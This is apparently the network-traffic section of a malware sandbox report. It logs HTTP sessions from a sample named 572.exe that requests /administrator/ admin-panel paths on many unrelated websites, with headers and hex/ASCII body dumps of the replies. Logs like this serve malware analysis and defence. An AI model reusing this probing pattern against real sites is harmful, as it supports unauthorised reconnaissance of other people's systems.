                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.460931063 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IROBcQt3SQkxy9NX+3thtf90NpuuQl9buOIFD76u2q6O89LDKwEN4b71WTJ1ixhDtg2Xl6Grh7DzUq4GAcWWBA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.668589115 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IROBcQt3SQkxy9NX+3thtf90NpuuQl9buOIFD76u2q6O89LDKwEN4b71WTJ1ixhDtg2Xl6Grh7DzUq4GAcWWBA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                167192.168.2.655277170.114.52.280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.787453890 CET177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.942384958 CET1017INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://gitam.zoom.us/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=yiq1B8YEZVhYo.D8k_mwhbTalJ.JjtmRDL6E40Nidh4-1707131690-1-ATVYwLWBgjiKUCE4omuuds5N59R+DQZZVEpX+yPROipOuIZAap/jQ4iYwVOrnUjoW61qq/+ha5oVKmj94MXzb2w=; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ekG0kxxZNXtqOpt7JmtxZ7ikKIeyiE5Z%2F%2BTHSd3WWJV41RPpXfzuBvRmEbAE7kmfcF264fZv8kLLx%2Fg146rwHGN1hr%2FASFhVbS1s%2Bbpmd%2FrtOp2brTfBZX%2BBLK%2Ftses%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6bbff34527-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.244151115 CET349OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=yiq1B8YEZVhYo.D8k_mwhbTalJ.JjtmRDL6E40Nidh4-1707131690-1-ATVYwLWBgjiKUCE4omuuds5N59R+DQZZVEpX+yPROipOuIZAap/jQ4iYwVOrnUjoW61qq/+ha5oVKmj94MXzb2w=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.367451906 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qK9PNyzwXathFv3E3jUcK4mRbmY5M9WqFnyeUWG0aNUl9ki6VC%2BBp6ajRMQUMjslVYpXWxl%2BjxOE%2BM1sbJbsmOdiYF9Qwnq%2BlTV9ZqfNTzGVrCDKICObICLlzVJMXTQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd435c484527-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 36 12 fd df 9f 62 a2 02 89 0d 44 52 bc 9b 34 b9 58 d6 a1 b7 9b 03 02 6c d1 bd 6e 16 bd 45 b1 30 28 72 64 b1 a1 48 95 a4 ac f8 d2 7c f7 03 45 c9 91 7f 24 ed e2 0e 08 10 51 1c be 99 79 7c 33 22 9d 1c bd ff e9 dd dd 97 8f 37 50 d8 52 a4 a3 e4 28 0c 7f e5 39 08 0b b7 37 70 f9 35 85 c4 4d 00 15 c4 98 79 20 55 f8 9b 01 8e df 83 12 8c 63 00 82 c8 e5 3c 40 19 7e fe 14 a4 90 1c fd 8a 92 f1 fc 6b 18 3e 43 75 38 00 87 a1 2e bf 0d ea ea 15 a8 ab 6f 80 5a da 0e cd bd 38 94 e5 3e 4a 18 6e 23 15 48 58 3a 4a 2c b7 02 d3 1f ac 45 69 b9 92 f0 33 fe 5e 73 8d ec 08 fe 80 77 42 d5 2c 17 44 63 12 7b bb 51 52 a2 25 40 0b a2 0d da 79 f0 f9 ee 9f e1 55 00 71 3f 51 58 5b 85 0e 61 35 0f de 29 e9 40 c3 bb 75 85 01 50 3f 9a 07 16 1f 6c ec e2 9d 6d 60 5e 43 f9 77 f8 f9 87 f0 9d 2a 2b 62 79 26 86 40 b7 37 f3 1b b6 c4 c1 3a 49 4a 9c 07 5a 65 ca 9a 81 a1 54 5c 32 7c 38 05 a9 72 25 84 6a f6 96 ac 38 36 95 d2 76 b0 a8 e1 cc 16 73 86 2b 4e 31 6c 07 a7 5c 72 cb 89 08 0d 25 02 e7 53 8f 22 b8 bc 07 8d 62 1e 18 bb 16 68 0a 44 1b 00 67 f3 80 e6 0b ff 2a a4 c6 04 50 68 cc e7 41 4c 99 0c e9 92 c7 7e 2a a6 79 84 5a 2b 6d a2 d6 28 de d5 f0 df be a6 2f bb 38 79 76 c1 d1 79 39 f9 53 2f 1c 7b 47 db 6a 68 0d d3 4c b1 f5 63 49 f4 92 cb eb b3 59 45 18 e3 72 79 7d f6 94 78 a0 74 34 1a 28 10 5d 7c d3 b3 4e 83 a3 c4 50 cd 2b 9b 8e 00 78 0e e3 23 49 56 7c 49 ac d2 11 55 ea 9e e3 8d 24 99 40 36 81 c7 91 2b 81 86 4b a6 9a 88 30 76 b3 42 69 3f 70 63 51 a2 1e 9f bc ff e9 c7 4e 39 1f 14 61 c8 4e 4e 21 af 25 6d c5 39 ee 57 03 ac 88 86 0e 58 c0 1c 98 a2 75 89 d2 46 4b b4 37 02 dd e3 3f d6 b7 6c 7c e2 6d 42 22 50 db 93 c9 ac 5b dd
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c6Xo6bDR4XlnE0(rdH|E$Qy|3"7PR(97p5My Uc<@~k>Cu8.oZ8>Jn#HX:J,Ei3^swB,Dc{QR%@yUq?QX[a5)@uP?lm`^Cw*+by&@7:IJZeT\2|8r%j86vs+N1l\r%S"bhDg*PhAL~*yZ+m(/8yvy9S/{GjhLcIYEry}xt4(]|NP+x#IV|IU$@6+K0vBi?pcQN9aNN!%m9WXuFK7?l|mB"P[
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.367472887 CET762INData Raw: af 8c da bc 22 c6 4d 25 c8 1a e6 70 92 09 45 ef 4f bc dd d3 64 04 f0 34 4a e2 3e b5 bd 2a 1a 8d 92 b8 2b 24 c7 9d 4b 3e 61 7c d5 ed 7f d8 68 52 55 a8 83 b4 85 6b 67 ba 22 a5 b9 0f 09 fa 87 b0 dd 20 37 ec 22 6e c7 9d 92 06 39 04 c0 88 25 a1 d5 44
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "M%pEOd4J>*+$K>a|hRUkg" 7"n9%DA,w.ALMqt^BpjfN"{t.zjf~$Znz}kUCAVY!A$AS|Y 1AE@4$H?JQmx!A~z
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.367490053 CET432INData Raw: c8 95 b4 a1 c1 92 67 4a b0 20 bd ba 38 23 19 3b 7f 7b 41 cf af ce 2f de 5c ba f3 95 33 df ea b6 2f c4 60 b0 22 da 9d ab 9c ff 82 33 86 32 48 8f b3 5a 88 d9 fe ea ee 2b 3f 08 3f e4 55 f0 42 62 1e ec 40 7e dd 6e 7e 51 b5 86 db 8f d7 fd e6 66 b5 b5
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: gJ 8#;{A/\3/`"32HZ+??UBb@~n~QfJ]WA5C>0?2=FjC64^M|?8ZoDRcRV&sFB1_*U0H1GQw52q4MD7*%{~2M$[;D-2APILj\


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                168192.168.2.655205104.21.60.18880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.788306952 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: netizion.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.914009094 CET670INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://netizion.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6SAhXxKhQsOu2HJl21acZG4fVEFMs458vmHgA06q4jhBoVhwheMoZSWUwkL5Sdu5Pw7yvOdkxIM%2FZvlDq%2FLFq%2BmqHxj4eAndexmNx1iJ%2BYCHOqqB03uy8PJaPUbtvOg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6bcebe6773-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.185437918 CET185OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: netizion.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.310420036 CET677INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://netizion.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aqnnUUeF1bu%2BNTc%2FUVAOoI6nvT3IKmBmIEJ0y5VyuqR5QJkEvTb2pKOQYWsbX%2BdHOpmBtagSkvoMiEYdn8c5T7jxRWZUHeWDAhKR1QyA5bfWtZhzk2IDlUx5QAO0JXI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42f84e6773-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                169192.168.2.65520354.183.63.24180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.788619041 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.973685026 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=043e21066f59341f79d55d583419ce99; expires=Mon, 04 Mar 2024 11:14:50 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=043e21066f59341f79d55d583419ce99; expires=Mon, 04 Mar 2024 11:14:50 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: b3ImgELbU2l0Yu6aF3X
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 32 34 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 5c 76 12 27 1b 27 99 1e 64 03 a3 48 16 25 3a 24 8b 61 15 6d b9 3d f9 98 c1 3e 0c 66 81 7d 1a ec cb be fa c7 f6 9c 22 29 91 12 95 d8 dd 4a 63 4d c8 2a d7 e5 dc 6f 55 2c 1f 7c 77 f2 f2 f8 cd 5f 5f 9d 92 99 0c fc f1 c1 77 ba fe de 73 c9 b3 53 32 f8 30 26 f9 cf 01 0e 12 c7 8b 0f 35 5f c6 1a f1 69 38 3d d4 58 a8 bf 3d d7 88 ed 53 21 0e 35 8f 0d b4 31 39 f8 ee 3d 0b 1d cf fd a0 eb 45 60 c3 07 03 1b 6e 00 36 95 19 3c ec 18 57 c3 8a a4 6e c5 6a bd ae 17 61 ec 1c cc 18 75 c6 3b 8a 8a 80 49 0a 4c cb 48 67 9f 12 ef ea 50 fb 59 7f 3b d1 8f 79 10 51 e9 59 3e 03 5a 78 28 59 28 0f b5 67 a7 87 cc 99 42 8f b1 69 ed 71 3a 55 7f 73 13 15 17 4a 36 97 06 92 b8 4f ec 19 8d 05 93 87 6f df 3c d6 07 2b 90 42 1a b0 43 8d 46 91 cf 74 4f 26 21 13 3a fc 51 80 03 7f e9 9e 73 38 6c 0f f7 7a bb 83 5e af 49 b0 87 c6 d3 24 c0 71 a4 44 8c 0c 23 92 2d c1 ec 24 66 2d 2f b8 4a 5a 36 0f 8c 10 29 f8 93 e0 49 6c b3 43 8b 86 21 8b 15 f2 22 e2 29 e7 53 c0 1c f9 f4 a6 1a 2f 00 4a 21 06 dc f2 7c 66 f3 d8 e1 57 74 0d 4e ca 40 3a 47 bf 66 16 02 d3 6d 1a d1 b2 34 6f 98 b8 df 52 21 a9 4c 84 6e d1 18 9a 37 25 18 96 4f ed 8f ba 8c 69 28 fc c4 86 ae ff 87 c4 f8 5e f8 91 c4 cc cf 01 4a 9e d8 33 dd 83 65 1a 11 de 2f 0c cc 7c 77 6f be bb a7 91 59 cc dc 43 0d b5 08 4a 5c d5 20 7c 02 1e 1a d7 9e 9c 05 cc f0 82 a9 e1 d2 2b 84 62 ac 82 d5 15 b8 56 14 4e ef 4d 40 df 9c f7 cd ed 11 a0 c0 3d 88 80 bd ce 7c af b3 3d 02 14 b8 87 11 d0 9f ef f5 b7 48 00 82 7b 10 01 ed 76 6f 0e 9f ed 91 90 01 7c 18 11
